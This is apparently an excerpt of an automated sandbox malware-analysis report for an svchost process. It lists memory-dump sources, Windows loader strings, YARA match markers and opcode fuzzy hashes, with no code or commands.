                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                        • API String ID: 0-4274184382
                                                                                        Strings
                                                                                        • @, xrefs: 038EC1F1
                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 038EC1C5
                                                                                        • PreferredUILanguages, xrefs: 038EC212
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                        • API String ID: 0-2968386058
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                        • API String ID: 0-1373925480
                                                                                        Strings
                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 038B4888
                                                                                        • LdrpCheckRedirection, xrefs: 038B488F
                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 038B4899
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                        • API String ID: 0-3154609507
                                                                                        Strings
                                                                                        • SXS: %s() passed the empty activation context data, xrefs: 038A29FE
                                                                                        • RtlCreateActivationContext, xrefs: 038A29F9
                                                                                        • Actx , xrefs: 038633AC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                        • API String ID: 0-859632880
                                                                                        Strings
                                                                                        • minkernel\ntdll\ldrtls.c, xrefs: 038A1A51
                                                                                        • LdrpInitializeTls, xrefs: 038A1A47
                                                                                        • DLL "%wZ" has TLS information at %p, xrefs: 038A1A40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                        • API String ID: 0-931879808
                                                                                        Strings
                                                                                        • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0387127B
                                                                                        • BuildLabEx, xrefs: 0387130F
                                                                                        • @, xrefs: 038712A5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                        • API String ID: 0-3051831665
                                                                                        Strings
                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 038B20F3
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 038B2104
                                                                                        • LdrpInitializationFailure, xrefs: 038B20FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-2986994758
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: #%u
                                                                                        • API String ID: 48624451-232158463
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: kLsE
                                                                                        • API String ID: 3446177414-3058123920
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$@
                                                                                        • API String ID: 0-149943524
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @4Cw@4Cw$PATH
                                                                                        • API String ID: 0-1794901795
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `$`
                                                                                        • API String ID: 0-197956300
                                                                                        Strings
                                                                                        • ResIdCount less than 2., xrefs: 0388EEC9
                                                                                        • Failed to retrieve service checksum., xrefs: 0388EE56
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                        • API String ID: 0-863616075
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Zzm)@$gfff
                                                                                        • API String ID: 0-2134773077
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: Legacy$UEFI
                                                                                        • API String ID: 2994545307-634100481
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$$
                                                                                        • API String ID: 0-233714265
                                                                                        Strings
                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0383A2FB
                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0383A309
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                        • API String ID: 0-2876891731
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .Local\$@
                                                                                        • API String ID: 0-380025441
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: MUI
                                                                                        • API String ID: 0-1339004836
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: P`1wRb1w
                                                                                        • API String ID: 0-487437271
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ICwICw@4Cw@4Cw
                                                                                        • API String ID: 0-911715774
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0
                                                                                        • API String ID: 0-4108050209
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (
                                                                                        • API String ID: 0-3887548279
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (
                                                                                        • API String ID: 0-3887548279
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ICwICw@4Cw@4Cw
                                                                                        • API String ID: 0-911715774
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID: 0-3916222277
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: }
                                                                                        • API String ID: 0-4239843852
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @
                                                                                        • API String ID: 0-2766056989
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 04Cw04CwICwICw@4Cw@4Cw
                                                                                        • API String ID: 0-2356017458
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @
                                                                                        • API String ID: 0-2766056989
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: EXT-
                                                                                        • API String ID: 0-1948896318
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PreferredUILanguages
                                                                                        • API String ID: 0-1884656846
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: BinaryHash
                                                                                        • API String ID: 0-2202222882
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: verifier.dll
                                                                                        • API String ID: 0-3265496382
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Flst
                                                                                        • API String ID: 0-2374792617
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: L4CwL4Cw
                                                                                        • API String ID: 0-1654103815
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Actx
                                                                                        • API String ID: 0-89312691
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrCreateEnclave
                                                                                        • API String ID: 0-3262589265
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7335603a07ee1fe6c162509e06ab1239cbb0976b0ea55dabcecf885a1b3865d1
                                                                                        • Instruction ID: 97416e1b80f47dec81f4750f8ad923be7fee1c3ee06b4ff9d67b73681ef9c502
                                                                                        • Opcode Fuzzy Hash: 7335603a07ee1fe6c162509e06ab1239cbb0976b0ea55dabcecf885a1b3865d1
                                                                                        • Instruction Fuzzy Hash: D602E2386046558FDB64CFAAC450275FBF1BF89304B1889DADAD6CF281D738E942DB60
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9529bef6dbea272469cde8f3c0e3ac5897c8109444f047ca9f327d63f8872eb3
                                                                                        • Instruction ID: b92536f5507473935848248b8e82035bc6752ca2915ba2c84789ce3e54e7d12f
                                                                                        • Opcode Fuzzy Hash: 9529bef6dbea272469cde8f3c0e3ac5897c8109444f047ca9f327d63f8872eb3
                                                                                        • Instruction Fuzzy Hash: 53F1F772E006158FCB18DFA9C9A067EFBF9AF9821071D41ADD456DB3C0D634EA41CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3c4cc46459a1c0d57e19bb74885f54cea9cede1541bc4110fd90b355918d1703
                                                                                        • Instruction ID: 58197d0b4b458f115272a0087b45b6e95c815865b953e9b787d6df40349d6520
                                                                                        • Opcode Fuzzy Hash: 3c4cc46459a1c0d57e19bb74885f54cea9cede1541bc4110fd90b355918d1703
                                                                                        • Instruction Fuzzy Hash: 8C819572E005199FCB14CFF9C8805AEB7F5FF88214B1842AAD925E7294D774E951CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9cd065a2f2bfc1e03a51f9c5a96f36dab0dd90abb8e0d5267d68f0a3083070f1
                                                                                        • Instruction ID: 1630db2ca99528ed375757eb80c4734e9e27aab3c157cf61a07b901d07317e9d
                                                                                        • Opcode Fuzzy Hash: 9cd065a2f2bfc1e03a51f9c5a96f36dab0dd90abb8e0d5267d68f0a3083070f1
                                                                                        • Instruction Fuzzy Hash: B0819071A0061D9FDF14CFA9C8849AFFBB2FF85214B2882E5E954DB745D630E941CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d6c5947892498fb1df639e17f6c7e2804e64eb00d312e0796a28348bdc42b852
                                                                                        • Instruction ID: 15d6e7d615e1bc79195d20538a37b02ead69cbff3231dfe850efa6825033e3dd
                                                                                        • Opcode Fuzzy Hash: d6c5947892498fb1df639e17f6c7e2804e64eb00d312e0796a28348bdc42b852
                                                                                        • Instruction Fuzzy Hash: 42816076E006159BCB28CF99C5906ADFBF1EF89310F1981A9D816EF385D734AD41CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                        • Instruction ID: ad235db8e8bd09c2795515e72301e3c1a0c2b5e2b94814031143dd363caaf317
                                                                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                        • Instruction Fuzzy Hash: DA816F35A102099FCF18DF98C890AAEB7B6AF84324F1881A9D91ADB344D778E901CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                        • Instruction ID: 25068366e0c397f6f81a6f80546ac01c4b79f729b346a68d8c630d22cc5b2bd4
                                                                                        • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                        • Instruction Fuzzy Hash: 33814B76E001198BEF14DE9CC9807ADFBB2FB84244F1D81AADC16EB344D635AA44CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0dc5b5954caeffdceee693550875a876566246c340eec715a460943e597562b5
                                                                                        • Instruction ID: ce1875aa831ebe4e39a6a11676ba3a279601b2653b2b609a6bd24e843c2a02a1
                                                                                        • Opcode Fuzzy Hash: 0dc5b5954caeffdceee693550875a876566246c340eec715a460943e597562b5
                                                                                        • Instruction Fuzzy Hash: 0A817E75A00709AFDB21CFE8C980AEEF7BAFB88354F144469E555E7250DB30AC05CB60
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 992b41f71980abcd1771bb649c11863b213b8b512bce209dd1fda1894d671f78
                                                                                        • Instruction ID: c6782c14ed93af491dfacffedab586895f781050f124917fcd93fea2274b96d2
                                                                                        • Opcode Fuzzy Hash: 992b41f71980abcd1771bb649c11863b213b8b512bce209dd1fda1894d671f78
                                                                                        • Instruction Fuzzy Hash: 5271E7342056548EEB26CEAAC940736BBE1AB95708F2885DEFC96CB1C4D735E806C761
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8574575d581565780014a7443e9619eef98333b0186a08699c7d02b87332beef
                                                                                        • Instruction ID: 3a065d40848ca9c644555c16bfa37befb518f8206a429a2bb6e81c16c8452619
                                                                                        • Opcode Fuzzy Hash: 8574575d581565780014a7443e9619eef98333b0186a08699c7d02b87332beef
                                                                                        • Instruction Fuzzy Hash: 2571D0B5C0562AAFDB25CF99C5907BEBBB8FF59704F18419AE841EB750D3349800CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 26467bd0267feeda977a1ebbe6c602632bb6013bc478fd8599ea1e88efe0415f
                                                                                        • Instruction ID: c98a8743baaf1901b6235f4af01fb3880f7f24474e5df0f9efd4c1e8c819db4e
                                                                                        • Opcode Fuzzy Hash: 26467bd0267feeda977a1ebbe6c602632bb6013bc478fd8599ea1e88efe0415f
                                                                                        • Instruction Fuzzy Hash: 90818A70D006A59FDB24CFAAC440AAABBF0EF8A740F048499E895EB385D374D949DF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 32e13d1b4d38eaab4dbbcbde329f1abb32930df0f61e8b02784aa2a3a589e9f6
                                                                                        • Instruction ID: 01745447d673ec588e724df738ec85b2535e8503f58b7829bbf0f39d03782b83
                                                                                        • Opcode Fuzzy Hash: 32e13d1b4d38eaab4dbbcbde329f1abb32930df0f61e8b02784aa2a3a589e9f6
                                                                                        • Instruction Fuzzy Hash: F761C575E0031A9FEB10EEF9C8809BFB769AF44254F1445B9FA12EB240EB70D945CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3889d5739ab2bd80899c7435df2705d3143ddcb7180bcac29641fbdb9a6a31a9
                                                                                        • Instruction ID: 3a5d7ed2a26f6aed29518b0773d32c6f3f624228754a8148cda6e0fdc2d04951
                                                                                        • Opcode Fuzzy Hash: 3889d5739ab2bd80899c7435df2705d3143ddcb7180bcac29641fbdb9a6a31a9
                                                                                        • Instruction Fuzzy Hash: 9971E1356086459FD311DFA8C480B2AB7E5FF88314F0989EAF898CB751EB38D845CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e7d06382d8593de5ef58a23eb60464e20ec731f29d8409ac26fd70ea0aae5f01
                                                                                        • Instruction ID: 30102beee1a148781089547db5c345ea0facb383225025caeaec739770258073
                                                                                        • Opcode Fuzzy Hash: e7d06382d8593de5ef58a23eb60464e20ec731f29d8409ac26fd70ea0aae5f01
                                                                                        • Instruction Fuzzy Hash: 4B719F7DA05626DBCB25CFAAC08017AF3F1FF46705B6A84AEDA52D7240D374E940CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                        • Instruction ID: 7c7a8946825c25e9def464743e222479a367bb2891a095689037dbad8d359588
                                                                                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                        • Instruction Fuzzy Hash: 5C715EB5A0061AEFCB10DFE9C984ADEBBB9FF48700F1445A9E505EB650DB34EA01CB50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 996c6d588f9e078e6f8a4242326751a86649d7aeb6feb35ed0186c6c1815fd5f
                                                                                        • Instruction ID: 0669acd9cf2523f8f45234d2f00cd14020bfb650fa6f77780d2f1ed0c91aaf0e
                                                                                        • Opcode Fuzzy Hash: 996c6d588f9e078e6f8a4242326751a86649d7aeb6feb35ed0186c6c1815fd5f
                                                                                        • Instruction Fuzzy Hash: 7871F236210B45EFDB31DFA8C844F6AB7A6EF84724F1848ACE155CB6A0E774E944CB50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 296c77c80f35948b53e7e1890173835cd97fd1caecc5ad7ad8524c25a60152e8
                                                                                        • Instruction ID: d409071a3bb02fd0d2cb3daf3b8a3ad448391074a6e6aa020c39248891d451e6
                                                                                        • Opcode Fuzzy Hash: 296c77c80f35948b53e7e1890173835cd97fd1caecc5ad7ad8524c25a60152e8
                                                                                        • Instruction Fuzzy Hash: 34512E75A002295FDB14DFE9C8809BAB7E6EF84350B1941E9FE55DB384DA34C942C7A0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
